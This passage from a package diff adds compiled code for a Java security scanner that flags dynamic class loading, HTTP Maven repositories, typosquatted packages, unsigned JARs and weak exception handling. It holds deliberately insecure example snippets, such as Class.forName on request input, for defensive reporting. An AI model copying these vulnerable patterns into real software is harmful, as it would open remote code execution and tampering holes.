+ * Updated for OWASP 2025 with enhanced Maven/Gradle security (Phase 7B Day 7).
8
+ */
9
+ Object.defineProperty(exports, "__esModule", { value: true });
10
+ exports.checkEnhancedSupplyChain = checkEnhancedSupplyChain;
11
+ const createVulnerability_1 = require("../utils/createVulnerability");
12
+ /**
13
+ * Checks for enhanced supply chain security vulnerabilities in Java code
14
+ *
15
+ * Covers:
16
+ * - Check #1: Dynamic class loading with user input (CRITICAL)
17
+ * - Check #2: Insecure Maven repositories (HIGH)
18
+ * - Check #3: Package typosquatting patterns (CRITICAL)
19
+ * - Check #4: Unsigned JAR usage (HIGH) - NEW OWASP 2025
20
+ * - Check #5: Dependency confusion (HIGH) - NEW OWASP 2025
21
+ * - Check #6: Runtime bytecode loading (CRITICAL) - NEW OWASP 2025
22
+ *
23
+ * @param lines - Array of code lines
24
+ * @returns Array of security vulnerabilities found
25
+ */
26
+ function checkEnhancedSupplyChain(lines) {
27
+ const vulnerabilities = [];
28
+ let inMultiLineComment = false;
29
+ // Track user input variables for dynamic class loading detection
30
+ const userInputVars = new Set();
31
+ lines.forEach((line, index) => {
32
+ const trimmedLine = line.trim();
33
+ // CRITICAL: Track multi-line comment blocks (/* ... */)
34
+ if (trimmedLine.includes('/*')) {
35
+ inMultiLineComment = true;
36
+ }
37
+ if (trimmedLine.includes('*/')) {
38
+ inMultiLineComment = false;
39
+ return; // Skip the line with */
40
+ }
41
+ // CRITICAL: Skip all lines inside multi-line comments and single-line comments
42
+ // FIX (Dec 6, 2025): Removed trimmedLine.startsWith('*') check
43
+ // Reason: Lines in multi-line comments can start with '-', text, etc. (not just '*')
44
+ // Example: "- Class.forName(userInput)" in documentation was being detected
45
+ // Solution: Rely on inMultiLineComment flag only
46
+ if (!trimmedLine ||
47
+ inMultiLineComment ||
48
+ trimmedLine.startsWith('//')) {
49
+ return;
50
+ }
51
+ const lowerLine = trimmedLine.toLowerCase();
52
+ // Track variables that receive user input
53
+ if (lowerLine.includes('request.getparameter') ||
54
+ lowerLine.includes('getuserinput') ||
55
+ lowerLine.includes('readuserinput')) {
56
+ const varMatch = trimmedLine.match(/(\w+)\s*=/);
57
+ if (varMatch) {
58
+ userInputVars.add(varMatch[1]);
59
+ }
60
+ }
61
+ // Check #1: Dynamic class loading with user input (ENHANCED OWASP 2025)
62
+ if (lowerLine.includes('class.forname(') || lowerLine.includes('classloader.loadclass(') ||
63
+ lowerLine.includes('.loadclass(')) {
64
+ // Check if using user input variable or direct request parameter
65
+ let usesUserInput = false;
66
+ if (lowerLine.includes('request.getparameter') || lowerLine.includes('getuserinput')) {
67
+ usesUserInput = true;
68
+ }
69
+ // Check if any tracked user input variable is used
70
+ for (const varName of userInputVars) {
71
+ if (trimmedLine.includes(varName)) {
72
+ usesUserInput = true;
73
+ break;
74
+ }
75
+ }
76
+ // Exclude hardcoded strings
77
+ const hasHardcodedString = /class\.forname\s*\(\s*"[^"]+"\s*\)/i.test(trimmedLine);
78
+ // Check for validation/whitelist
79
+ const hasSameLineValidation = lowerLine.includes('validate') || lowerLine.includes('whitelist');
80
+ const prevLines = lines.slice(Math.max(0, index - 10), index);
81
+ const hasWhitelistContext = prevLines.some(l => {
82
+ const lowerPrev = l.toLowerCase();
83
+ return (lowerPrev.includes('whitelist') || lowerPrev.includes('allowlist') ||
84
+ lowerPrev.includes('allowed')) &&
85
+ (lowerPrev.includes('set.of') || lowerPrev.includes('arrays.aslist'));
86
+ });
87
+ if (usesUserInput && !hasHardcodedString && !hasSameLineValidation && !hasWhitelistContext) {
88
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('dynamic-class-loading', 'Dynamic class loading with user input enables arbitrary code execution', 'Whitelist allowed class names and validate against a predefined set of safe classes', index + 1, 'Loading classes dynamically based on user input allows attackers to instantiate arbitrary classes, leading to Remote Code Execution (RCE), deserialization attacks, and complete system compromise', 'String className = request.getParameter("class");\nClass.forName(className); // RCE vulnerability!', [
89
+ 'Remote Code Execution through arbitrary class instantiation',
90
+ 'Deserialization gadget chain exploitation',
91
+ 'Access to internal/restricted classes',
92
+ 'Complete application and server compromise',
93
+ 'Privilege escalation to system level'
94
+ ], 'Class.forName(userInput)', 'String[] ALLOWED = {"com.example.PluginA"};\nif (!Arrays.asList(ALLOWED).contains(className)) throw new SecurityException();\nClass.forName(className);', 'Never load classes dynamically from user input. Always use a whitelist of allowed class names and validate strictly before loading.'));
95
+ }
96
+ }
97
+ // Check #2: Insecure Maven repositories (HTTP repositories) - NEW OWASP 2025
98
+ if ((lowerLine.includes('repository') || lowerLine.includes('maven') || lowerLine.includes('gradle')) &&
99
+ lowerLine.includes('http://') && !lowerLine.includes('localhost')) {
100
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('insecure-maven-repository', 'HTTP repository detected - dependencies vulnerable to tampering', 'Use HTTPS repositories or trusted internal repositories for dependencies', index + 1, 'HTTP repositories are vulnerable to man-in-the-middle attacks and package tampering', '<url>http://insecure-repo.com/maven2</url> // vulnerable to MITM', [
101
+ 'Man-in-the-middle attacks on dependency downloads',
102
+ 'Package tampering and malicious code injection',
103
+ 'Supply chain attacks through compromised repositories',
104
+ 'Unauthorized modification of dependencies in transit'
105
+ ], '<url>http://repo.example.com/maven2</url>', '<url>https://repo.example.com/maven2</url>', 'Repository URLs should use HTTPS to prevent tampering during dependency downloads'));
106
+ }
107
+ // Check #3: Package typosquatting patterns - NEW OWASP 2025
108
+ // Common typos: apachi (apache), gooogle (google), commmons (commons)
109
+ if ((lowerLine.includes('import ') || lowerLine.includes('dependency>')) &&
110
+ (lowerLine.includes('apachi') || // should be "apache"
111
+ lowerLine.includes('gooogle') || // should be "google"
112
+ lowerLine.includes('commmons') || // should be "commons"
113
+ lowerLine.includes('jacksonn') || // should be "jackson"
114
+ lowerLine.includes('guavaa') || // should be "guava"
115
+ lowerLine.includes('slf4jj') || // should be "slf4j"
116
+ lowerLine.includes('hibernatee'))) { // should be "hibernate"
117
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('package-typosquatting', 'Package typosquatting detected - potentially malicious dependency', 'Verify package names against Maven Central official packages', index + 1, 'Typosquatting packages can contain malicious code that mimics legitimate packages', 'import org.apachi.commons.lang; // should be "apache"', [
118
+ 'Malicious code execution from fake packages',
119
+ 'Supply chain attacks through package confusion',
120
+ 'Backdoor installation and data exfiltration',
121
+ 'Credential theft and system compromise'
122
+ ], 'import org.apachi.commons.lang.StringUtils;', 'import org.apache.commons.lang.StringUtils; // verify correct package name', 'Package names should be verified against official Maven Central listings to avoid typosquatting'));
123
+ }
124
+ // Check #4: Unsigned JAR usage - NEW OWASP 2025
125
+ if ((lowerLine.includes('urlclassloader') || lowerLine.includes('jarfile')) &&
126
+ !lines.slice(index, Math.min(index + 15, lines.length)).some(nextLine => {
127
+ const lowerNext = nextLine.toLowerCase();
128
+ return lowerNext.includes('getcertificates()') ||
129
+ lowerNext.includes('codesigner') ||
130
+ lowerNext.includes('verify') && lowerNext.includes('signature');
131
+ })) {
132
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('unsigned-jar-usage', 'Loading unsigned JAR without signature verification', 'Verify JAR signatures using getCertificates() or CodeSigner before loading', index + 1, 'Loading unsigned JARs can introduce malicious code into the application', 'JarFile jar = new JarFile("plugin.jar"); // no signature verification', [
133
+ 'Malicious code execution from tampered JARs',
134
+ 'Supply chain attacks through compromised plugins',
135
+ 'Backdoor installation without detection',
136
+ 'Unauthorized code execution and data theft'
137
+ ], 'URLClassLoader loader = new URLClassLoader(new URL[]{jarUrl});', 'JarFile jar = new JarFile("plugin.jar", true);\nCertificate[] certs = jar.getCertificates();\nif (certs == null) throw new SecurityException("Unsigned JAR");', 'Always verify JAR signatures before loading to prevent supply chain attacks'));
138
+ }
139
+ // Check #5: Dependency confusion - NEW OWASP 2025
140
+ // Only flag generic internal package names, not specific company names
141
+ if ((lowerLine.includes('<groupid>') || lowerLine.includes('groupid') || lowerLine.includes('implementation(')) &&
142
+ (lowerLine.includes('.internal') || lowerLine.includes('company.internal') ||
143
+ lowerLine.match(/^internal:/) ||
144
+ // Match standalone "internal" or "private" words (not part of longer names)
145
+ lowerLine.match(/\binternal\b/) || lowerLine.match(/\bprivate\b/))) {
146
+ // Exclude specific company names with verification keywords
147
+ const hasSpecificCompany = trimmedLine.match(/\b(yourcompany|mycompany|verified)\b/i);
148
+ // Check if there's proper repository configuration nearby
149
+ const contextLines = lines.slice(Math.max(0, index - 10), Math.min(index + 10, lines.length));
150
+ const hasPrivateRepo = contextLines.some(line => {
151
+ const lowerCtx = line.toLowerCase();
152
+ return (lowerCtx.includes('<repository>') && lowerCtx.includes('private')) ||
153
+ lowerCtx.includes('maven { url') && lowerCtx.includes('internal');
154
+ });
155
+ if (!hasPrivateRepo && !hasSpecificCompany) {
156
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('dependency-confusion', 'Dependency confusion risk: internal package without private repository configuration', 'Configure private repository with proper authentication and scope', index + 1, 'Internal package names without private repositories can be exploited through dependency confusion attacks', '<groupId>com.company.internal</groupId> // no private repo configured', [
157
+ 'Dependency substitution attacks from public repositories',
158
+ 'Installation of malicious packages with similar names',
159
+ 'Supply chain compromise through package confusion',
160
+ 'Unauthorized code execution and data theft'
161
+ ], '<dependency>\n <groupId>com.company.internal</groupId>', '<!-- Configure private repository -->\n<repository>\n <id>company-private</id>\n <url>https://private.company.com/maven2</url>\n</repository>', 'Internal dependencies must be resolved from authenticated private repositories to prevent confusion attacks'));
162
+ }
163
+ }
164
+ // Check #6: Runtime bytecode loading - NEW OWASP 2025
165
+ if (lowerLine.includes('defineclass(') ||
166
+ (lowerLine.includes('unsafe') && lowerLine.includes('defineclass')) ||
167
+ (lowerLine.includes('methodhandles.lookup') && lowerLine.includes('defineclass'))) {
168
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('runtime-bytecode-loading', 'Runtime bytecode loading detected - potential code injection vector', 'Avoid runtime bytecode generation or implement strict validation and signing', index + 1, 'Loading bytecode at runtime bypasses normal security controls and can introduce malicious code', 'defineClass(null, bytecode, 0, bytecode.length); // arbitrary bytecode execution', [
169
+ 'Arbitrary code execution from untrusted bytecode',
170
+ 'Bypass of static analysis and security scanning',
171
+ 'Supply chain attacks through code generation',
172
+ 'Complete application and system compromise'
173
+ ], 'return defineClass(null, bytecode, 0, bytecode.length);', '// Validate bytecode signatures before loading\n// Or use standard class loading mechanisms instead', 'Runtime bytecode loading should be avoided or bytecode should be cryptographically verified'));
174
+ }
175
+ });
176
+ return vulnerabilities;
177
+ }
178
+ //# sourceMappingURL=enhanced-supply-chain.js.map
package/dist/src/lib/analyzers/java/security-checks/enhanced-supply-chain.js.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"enhanced-supply-chain.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/enhanced-supply-chain.ts"],"names":[],"mappings":";AAAA;;;;;;GAMG;;AAmBH,4DA6PC;AA7QD,sEAA+E;AAE/E;;;;;;;;;;;;;GAaG;AACH,SAAgB,wBAAwB,CACtC,KAAe;IAEf,MAAM,eAAe,GAA4B,EAAE,CAAC;IACpD,IAAI,kBAAkB,GAAG,KAAK,CAAC;IAE/B,iEAAiE;IACjE,MAAM,aAAa,GAAG,IAAI,GAAG,EAAU,CAAC;IAExC,KAAK,CAAC,OAAO,CAAC,CAAC,IAAI,EAAE,KAAK,EAAE,EAAE;QAC5B,MAAM,WAAW,GAAG,IAAI,CAAC,IAAI,EAAE,CAAC;QAEhC,wDAAwD;QACxD,IAAI,WAAW,CAAC,QAAQ,CAAC,IAAI,CAAC,EAAE,CAAC;YAC/B,kBAAkB,GAAG,IAAI,CAAC;QAC5B,CAAC;QACD,IAAI,WAAW,CAAC,QAAQ,CAAC,IAAI,CAAC,EAAE,CAAC;YAC/B,kBAAkB,GAAG,KAAK,CAAC;YAC3B,OAAO,CAAC,wBAAwB;QAClC,CAAC;QAED,+EAA+E;QAC/E,+DAA+D;QAC/D,qFAAqF;QACrF,4EAA4E;QAC5E,iDAAiD;QACjD,IAAI,CAAC,WAAW;YACZ,kBAAkB;YAClB,WAAW,CAAC,UAAU,CAAC,IAAI,CAAC,EAAE,CAAC;YACjC,OAAO;QACT,CAAC;QAED,MAAM,SAAS,GAAG,WAAW,CAAC,WAAW,EAAE,CAAC;QAE5C,0CAA0C;QAC1C,IAAI,SAAS,CAAC,QAAQ,CAAC,sBAAsB,CAAC;YAC1C,SAAS,CAAC,QAAQ,CAAC,cAAc,CAAC;YAClC,SAAS,CAAC,QAAQ,CAAC,eAAe,CAAC,EAAE,CAAC;YACxC,MAAM,QAAQ,GAAG,WAAW,CAAC,KAAK,CAAC,WAAW,CAAC,CAAC;YAChD,IAAI,QAAQ,EAAE,CAAC;gBACb,aAAa,CAAC,GAAG,CAAC,QAAQ,CAAC,CAAC,CAAC,CAAC,CAAC;YACjC,CAAC;QACH,CAAC;QAED,wEAAwE;QACxE,IAAI,SAAS,CAAC,QAAQ,CAAC,gBAAgB,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,wBAAwB,CAAC;YACpF,SAAS,CAAC,QAAQ,CAAC,aAAa,CAAC,EAAE,CAAC;YACtC,iEAAiE;YACjE,IAAI,aAAa,GAAG,KAAK,CAAC;YAE1B,IAAI,SAAS,CAAC,QAAQ,CAAC,sBAAsB,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,cAAc,CAAC,EAAE,CAAC;gBACrF,aAAa,GAAG,IAAI,CAAC;YACvB,CAAC;YAED,mDAAmD;YACnD,KAAK,MAAM,OAAO,IAAI,aAAa,EAAE,CAAC;gBACpC,IAAI,WAAW,CAAC,QAAQ,CAAC,OAAO,CAAC,EAAE,CAAC;oBAClC,aAAa,GAAG,IAAI,CAAC;oBACrB,MAAM;gBACR,CAAC;YACH,CAAC;YAED,4BAA4B;YAC5B,MAAM,kBAAkB,GAAG,qCAAqC,CAAC,IAAI,CAAC,WAAW,CAAC,CAAC;YAEnF,iCAAiC;YACjC,MAAM,qBAAqB,GAAG,SAAS,CAAC,QAAQ,CAAC,UAAU,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,WAAW,CAAC,CAAC;YAChG,MAAM,SAAS,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,EAAE,KAAK,GAAG,EAAE,CAAC,EAAE,KAAK,CAAC,CAAC;YAC9D,MAAM,mBAAmB,GAAG,SAAS,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE;gBAC7C,MAAM,SAAS,GAAG,CAAC,CAAC,WAAW,EAAE,CAAC;gBAClC,OAAO,CAAC,SAAS,CAAC,QAAQ,CAAC,WAAW,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,WAAW,CAAC;oBAClE,SAAS,CAAC,QAAQ,CAAC,SAAS,CAAC,CAAC;oBAC/B,CAAC,SAAS,CAAC,QAAQ,CAAC,QAAQ,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,eAAe,CAAC,CAAC,CAAC;YAC/E,CAAC,CAAC,CAAC;YAEH,IAAI,aAAa,IAAI,CAAC,kBAAkB,IAAI,CAAC,qBAAqB,IAAI,CAAC,mBAAmB,EAAE,CAAC;gBAC3F,eAAe,CAAC,IAAI,CAClB,IAAA,qDAA+B,EAC7B,uBAAuB,EACvB,wEAAwE,EACxE,qFAAqF,EACrF,KAAK,GAAG,CAAC,EACT,oMAAoM,EACpM,oGAAoG,EACpG;oBACE,6DAA6D;oBAC7D,2CAA2C;oBAC3C,uCAAuC;oBACvC,4CAA4C;oBAC5C,sCAAsC;iBACvC,EACD,0BAA0B,EAC1B,yJAAyJ,EACzJ,qIAAqI,CACtI,CACF,CAAC;YACJ,CAAC;QACH,CAAC;QAED,6EAA6E;QAC7E,IAAI,CAAC,SAAS,CAAC,QAAQ,CAAC,YAAY,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,OAAO,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,QAAQ,CAAC,CAAC;YACjG,SAAS,CAAC,QAAQ,CAAC,SAAS,CAAC,IAAI,CAAC,SAAS,CAAC,QAAQ,CAAC,WAAW,CAAC,EAAE,CAAC;YACtE,eAAe,CAAC,IAAI,CAClB,IAAA,qDAA+B,EAC7B,2BAA2B,EAC3B,iEAAiE,EACjE,0EAA0E,EAC1E,KAAK,GAAG,CAAC,EACT,qFAAqF,EACrF,kEAAkE,EAClE;gBACE,mDAAmD;gBACnD,gDAAgD;gBAChD,uDAAuD;gBACvD,sDAAsD;aACvD,EACD,2CAA2C,EAC3C,4CAA4C,EAC5C,mFAAmF,CACpF,CACF,CAAC;QACJ,CAAC;QAED,4DAA4D;QAC5D,sEAAsE;QACtE,IAAI,CAAC,SAAS,CAAC,QAAQ,CAAC,SAAS,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,aAAa,CAAC,CAAC;YACpE,CAAC,SAAS,CAAC,QAAQ,CAAC,QAAQ,CAAC,IAAI,qBAAqB;gBACrD,SAAS,CAAC,QAAQ,CAAC,SAAS,CAAC,IAAI,qBAAqB;gBACtD,SAAS,CAAC,QAAQ,CAAC,UAAU,CAAC,IAAI,sBAAsB;gBACxD,SAAS,CAAC,QAAQ,CAAC,UAAU,CAAC,IAAI,sBAAsB;gBACxD,SAAS,CAAC,QAAQ,CAAC,QAAQ,CAAC,IAAI,oBAAoB;gBACpD,SAAS,CAAC,QAAQ,CAAC,QAAQ,CAAC,IAAI,oBAAoB;gBACpD,SAAS,CAAC,QAAQ,CAAC,YAAY,CAAC,CAAC,EAAE,CAAC,CAAC,wBAAwB;YAChE,eAAe,CAAC,IAAI,CAClB,IAAA,qDAA+B,EAC7B,uBAAuB,EACvB,mEAAmE,EACnE,8DAA8D,EAC9D,KAAK,GAAG,CAAC,EACT,mFAAmF,EACnF,uDAAuD,EACvD;gBACE,6CAA6C;gBAC7C,gDAAgD;gBAChD,6CAA6C;gBAC7C,wCAAwC;aACzC,EACD,6CAA6C,EAC7C,4EAA4E,EAC5E,iGAAiG,CAClG,CACF,CAAC;QACJ,CAAC;QAED,gDAAgD;QAChD,IAAI,CAAC,SAAS,CAAC,QAAQ,CAAC,gBAAgB,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,SAAS,CAAC,CAAC;YACvE,CAAC,KAAK,CAAC,KAAK,CAAC,KAAK,EAAE,IAAI,CAAC,GAAG,CAAC,KAAK,GAAG,EAAE,EAAE,KAAK,CAAC,MAAM,CAAC,CAAC,CAAC,IAAI,CAAC,QAAQ,CAAC,EAAE;gBACtE,MAAM,SAAS,GAAG,QAAQ,CAAC,WAAW,EAAE,CAAC;gBACzC,OAAO,SAAS,CAAC,QAAQ,CAAC,mBAAmB,CAAC;oBACvC,SAAS,CAAC,QAAQ,CAAC,YAAY,CAAC;oBAChC,SAAS,CAAC,QAAQ,CAAC,QAAQ,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,WAAW,CAAC,CAAC;YACzE,CAAC,CAAC,EAAE,CAAC;YACP,eAAe,CAAC,IAAI,CAClB,IAAA,qDAA+B,EAC7B,oBAAoB,EACpB,qDAAqD,EACrD,4EAA4E,EAC5E,KAAK,GAAG,CAAC,EACT,yEAAyE,EACzE,uEAAuE,EACvE;gBACE,6CAA6C;gBAC7C,kDAAkD;gBAClD,yCAAyC;gBACzC,4CAA4C;aAC7C,EACD,gEAAgE,EAChE,+JAA+J,EAC/J,6EAA6E,CAC9E,CACF,CAAC;QACJ,CAAC;QAED,kDAAkD;QAClD,uEAAuE;QACvE,IAAI,CAAC,SAAS,CAAC,QAAQ,CAAC,WAAW,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,SAAS,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,iBAAiB,CAAC,CAAC;YAC3G,CAAC,SAAS,CAAC,QAAQ,CAAC,WAAW,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,kBAAkB,CAAC;gBACzE,SAAS,CAAC,KAAK,CAAC,YAAY,CAAC;gBAC7B,4EAA4E;gBAC5E,SAAS,CAAC,KAAK,CAAC,cAAc,CAAC,IAAI,SAAS,CAAC,KAAK,CAAC,aAAa,CAAC,CAAC,EAAE,CAAC;YAExE,4DAA4D;YAC5D,MAAM,kBAAkB,GAAG,WAAW,CAAC,KAAK,CAAC,uCAAuC,CAAC,CAAC;YAEtF,0DAA0D;YAC1D,MAAM,YAAY,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,EAAE,KAAK,GAAG,EAAE,CAAC,EAAE,IAAI,CAAC,GAAG,CAAC,KAAK,GAAG,EAAE,EAAE,KAAK,CAAC,MAAM,CAAC,CAAC,CAAC;YAC9F,MAAM,cAAc,GAAG,YAAY,CAAC,IAAI,CAAC,IAAI,CAAC,EAAE;gBAC9C,MAAM,QAAQ,GAAG,IAAI,CAAC,WAAW,EAAE,CAAC;gBACpC,OAAO,CAAC,QAAQ,CAAC,QAAQ,CAAC,cAAc,CAAC,IAAI,QAAQ,CAAC,QAAQ,CAAC,SAAS,CAAC,CAAC;oBACnE,QAAQ,CAAC,QAAQ,CAAC,aAAa,CAAC,IAAI,QAAQ,CAAC,QAAQ,CAAC,UAAU,CAAC,CAAC;YAC3E,CAAC,CAAC,CAAC;YAEH,IAAI,CAAC,cAAc,IAAI,CAAC,kBAAkB,EAAE,CAAC;gBAC3C,eAAe,CAAC,IAAI,CAClB,IAAA,qDAA+B,EAC7B,sBAAsB,EACtB,sFAAsF,EACtF,mEAAmE,EACnE,KAAK,GAAG,CAAC,EACT,2GAA2G,EAC3G,uEAAuE,EACvE;oBACE,0DAA0D;oBAC1D,uDAAuD;oBACvD,mDAAmD;oBACnD,4CAA4C;iBAC7C,EACD,2DAA2D,EAC3D,qJAAqJ,EACrJ,6GAA6G,CAC9G,CACF,CAAC;YACJ,CAAC;QACH,CAAC;QAED,sDAAsD;QACtD,IAAI,SAAS,CAAC,QAAQ,CAAC,cAAc,CAAC;YAClC,CAAC,SAAS,CAAC,QAAQ,CAAC,QAAQ,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,aAAa,CAAC,CAAC;YACnE,CAAC,SAAS,CAAC,QAAQ,CAAC,sBAAsB,CAAC,IAAI,SAAS,CAAC,QAAQ,CAAC,aAAa,CAAC,CAAC,EAAE,CAAC;YACtF,eAAe,CAAC,IAAI,CAClB,IAAA,qDAA+B,EAC7B,0BAA0B,EAC1B,qEAAqE,EACrE,8EAA8E,EAC9E,KAAK,GAAG,CAAC,EACT,gGAAgG,EAChG,kFAAkF,EAClF;gBACE,kDAAkD;gBAClD,iDAAiD;gBACjD,8CAA8C;gBAC9C,4CAA4C;aAC7C,EACD,yDAAyD,EACzD,qGAAqG,EACrG,6FAA6F,CAC9F,CACF,CAAC;QACJ,CAAC;IAEH,CAAC,CAAC,CAAC;IAEH,OAAO,eAAe,CAAC;AACzB,CAAC"}
package/dist/src/lib/analyzers/java/security-checks/exception-handling.d.ts ADDED
@@ -0,0 +1,25 @@
1
+ /**
2
+ * Java Exception Handling Security Checks
3
+ * OWASP A10:2025 - Mishandling of Exceptional Conditions
4
+ *
5
+ * Detects improper exception handling that can lead to security vulnerabilities.
6
+ * This is a completely NEW category in OWASP 2025.
7
+ */
8
+ import { SecurityVulnerability } from '../../types';
9
+ /**
10
+ * Checks for exception handling security vulnerabilities in Java code
11
+ *
12
+ * Covers:
13
+ * - Check #1: Empty catch blocks (MEDIUM)
14
+ * - Check #2: Broad exception catching (HIGH)
15
+ * - Check #3: Exception details exposed in responses (HIGH)
16
+ * - Check #4: Resource leaks in exception scenarios (MEDIUM)
17
+ * - Check #5: Improper exception propagation (MEDIUM)
18
+ * - Check #6: printStackTrace() usage (HIGH) - NEW OWASP 2025
19
+ * - Check #7: Swallowing InterruptedException (MEDIUM) - NEW OWASP 2025
20
+ *
21
+ * @param lines - Array of code lines
22
+ * @returns Array of security vulnerabilities found
23
+ */
24
+ export declare function checkExceptionHandling(lines: string[]): SecurityVulnerability[];
25
+ //# sourceMappingURL=exception-handling.d.ts.map
package/dist/src/lib/analyzers/java/security-checks/exception-handling.d.ts.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"exception-handling.d.ts","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/exception-handling.ts"],"names":[],"mappings":"AAAA;;;;;;GAMG;AAEH,OAAO,EAAE,qBAAqB,EAAE,MAAM,aAAa,CAAC;AAGpD;;;;;;;;;;;;;;GAcG;AACH,wBAAgB,sBAAsB,CACpC,KAAK,EAAE,MAAM,EAAE,GACd,qBAAqB,EAAE,CAmQzB"}
package/dist/src/lib/analyzers/java/security-checks/exception-handling.js ADDED
@@ -0,0 +1,179 @@
1
+ "use strict";
2
+ /**
3
+ * Java Exception Handling Security Checks
4
+ * OWASP A10:2025 - Mishandling of Exceptional Conditions
5
+ *
6
+ * Detects improper exception handling that can lead to security vulnerabilities.
7
+ * This is a completely NEW category in OWASP 2025.
8
+ */
9
+ Object.defineProperty(exports, "__esModule", { value: true });
10
+ exports.checkExceptionHandling = checkExceptionHandling;
11
+ const createVulnerability_1 = require("../utils/createVulnerability");
12
+ /**
13
+ * Checks for exception handling security vulnerabilities in Java code
14
+ *
15
+ * Covers:
16
+ * - Check #1: Empty catch blocks (MEDIUM)
17
+ * - Check #2: Broad exception catching (HIGH)
18
+ * - Check #3: Exception details exposed in responses (HIGH)
19
+ * - Check #4: Resource leaks in exception scenarios (MEDIUM)
20
+ * - Check #5: Improper exception propagation (MEDIUM)
21
+ * - Check #6: printStackTrace() usage (HIGH) - NEW OWASP 2025
22
+ * - Check #7: Swallowing InterruptedException (MEDIUM) - NEW OWASP 2025
23
+ *
24
+ * @param lines - Array of code lines
25
+ * @returns Array of security vulnerabilities found
26
+ */
27
+ function checkExceptionHandling(lines) {
28
+ const vulnerabilities = [];
29
+ let inMultiLineComment = false;
30
+ lines.forEach((line, index) => {
31
+ const trimmedLine = line.trim();
32
+ // CRITICAL: Track multi-line comment blocks (/* ... */)
33
+ if (trimmedLine.includes('/*')) {
34
+ inMultiLineComment = true;
35
+ }
36
+ if (trimmedLine.includes('*/')) {
37
+ inMultiLineComment = false;
38
+ return; // Skip the line with */
39
+ }
40
+ // CRITICAL: Skip all lines inside multi-line comments and single-line comments
41
+ // FIX (Dec 6, 2025): Removed trimmedLine.startsWith('*') check
42
+ // Reason: Lines in multi-line comments can start with '-', text, etc. (not just '*')
43
+ // Example: "- Empty catch blocks: catch (Exception e) {}" was being detected
44
+ // Solution: Rely on inMultiLineComment flag only
45
+ if (!trimmedLine ||
46
+ inMultiLineComment ||
47
+ trimmedLine.startsWith('//')) {
48
+ return;
49
+ }
50
+ const lowerLine = trimmedLine.toLowerCase();
51
+ // Check #1: Empty catch blocks
52
+ if (lowerLine.includes('catch') &&
53
+ (lowerLine.includes('{}') ||
54
+ // Check if the only non-empty line after catch is the closing brace
55
+ (() => {
56
+ const nextLines = lines.slice(index + 1, Math.min(index + 5, lines.length));
57
+ const nonEmptyLines = nextLines.filter(l => l.trim() && !l.trim().startsWith('//'));
58
+ return nonEmptyLines.length === 1 && nonEmptyLines[0].trim() === '}';
59
+ })())) {
60
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('empty-catch-block', 'Empty catch block silently ignores exceptions', 'Add proper exception handling, logging, or re-throw the exception', index + 1, 'Silent exception suppression can hide security vulnerabilities and cause unpredictable application behavior', 'try { riskyOperation(); } catch (Exception e) {} // error completely ignored', [
61
+ 'Security vulnerabilities hidden and undetected',
62
+ 'Application state corruption from ignored errors',
63
+ 'Debugging difficulties and maintenance issues',
64
+ 'Potential for cascading security failures'
65
+ ], 'catch (Exception e) {}', 'catch (Exception e) { logger.error("Operation failed", e); throw new ServiceException("Operation failed", e); }', 'Empty catch blocks prevent error visibility and can hide security-critical failures'));
66
+ }
67
+ // Check #2: Broad exception catching (catching Exception or Throwable)
68
+ // FIX (Dec 6, 2025): Exclude specific exception types and multi-exception catches
69
+ // Example good code: catch (SecurityException | ValidationException e) should NOT be flagged
70
+ // Now checks: exclude if contains '|' (multi-exception) OR specific exception (NameException pattern)
71
+ if (lowerLine.includes('catch') &&
72
+ (lowerLine.includes('(exception ') || lowerLine.includes('(throwable ') ||
73
+ lowerLine.includes('exception e') || lowerLine.includes('throwable t'))) {
74
+ // Exclude multi-exception catches (e.g., "SecurityException | ValidationException")
75
+ const isMultiException = trimmedLine.includes('|');
76
+ // Exclude specific exception types (e.g., SecurityException, ValidationException, IOException)
77
+ // Pattern: CapitalLetterException (not just "Exception")
78
+ const isSpecificException = trimmedLine.match(/\b[A-Z][a-zA-Z]*Exception\b/) &&
79
+ !trimmedLine.match(/\bException\s+[a-z]/) &&
80
+ !trimmedLine.match(/\bThrowable\s+[a-z]/);
81
+ if (!isMultiException && !isSpecificException) {
82
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('broad-exception-catching', 'Catching broad exception types can mask security-specific exceptions', 'Catch specific exception types instead of Exception or Throwable', index + 1, 'Broad exception catching can mask security-critical exceptions that require specific handling', 'catch (Exception e) { /* handles both SecurityException and IOException the same way */ }', [
83
+ 'Security exceptions masked by broad catching',
84
+ 'Authentication and authorization failures hidden',
85
+ 'Inappropriate error handling for different security contexts',
86
+ 'Loss of security-specific error information'
87
+ ], 'catch (Exception e)', 'catch (SecurityException | ValidationException e)', 'Catching broad exception types prevents proper security-specific exception handling'));
88
+ }
89
+ }
90
+ // Check #3: Exception details exposed in HTTP responses
91
